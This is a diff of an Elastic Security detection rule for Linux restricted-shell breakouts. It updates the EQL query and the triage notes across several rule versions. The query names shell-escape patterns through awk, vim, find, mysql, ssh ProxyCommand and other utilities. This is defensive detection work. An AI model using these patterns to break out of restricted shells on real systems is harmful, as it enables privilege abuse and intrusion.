"https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -106,7 +106,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json index a7b8fcf8b10..2c937b6bdcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_107.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\")) or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"*awk\", \"git\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \"-exec\" and process.parent.args == \";\" and process.parent.args == \"-p\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\")) or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -106,7 +106,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json index b8dc303ab9e..21e4f80af43 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_108.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", "references": [ "https://gtfobins.github.io/gtfobins/apt/", "https://gtfobins.github.io/gtfobins/apt-get/", @@ -107,7 +107,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json index f251b945a8a..470161ed184 100644 --- a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_109.json @@ -11,8 +11,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Linux Restricted Shell Breakout via Linux Binary(s)", - "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT\u0026CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to Manage \u2192 Policies, and edit one or more of your Elastic Defend integration policies.\n- Select the Policy settings tab, then scroll down to the Linux event collection section near the bottom.\n- Check the box for Process events, and turn on the Include session data toggle.\n- If you want to include file and network alerts in Session View, check the boxes for Network and File events.\n- If you want to enable terminal output capture, turn on the Capture terminal output toggle.\nFor more information about the additional fields collected when this setting is enabled and\nthe usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual parents or parent+arg combos */\n (process.name : \"*sh\" and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : \"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0\u003c\u00262 1\u003e\u00262\")\n)\n", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - 